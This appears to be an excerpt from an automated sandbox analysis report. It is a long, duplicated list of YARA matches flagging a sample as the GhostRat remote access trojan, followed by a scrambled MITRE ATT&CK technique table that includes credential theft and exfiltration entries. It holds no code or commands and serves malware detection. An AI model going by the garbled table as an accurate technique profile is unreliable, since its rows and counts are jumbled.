                      Yara detected GhostRat
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media                      		1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		11
                      Disable or Modify Tools                      		121
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		Logon Script (Windows)1
                      Access Token Manipulation                      		21
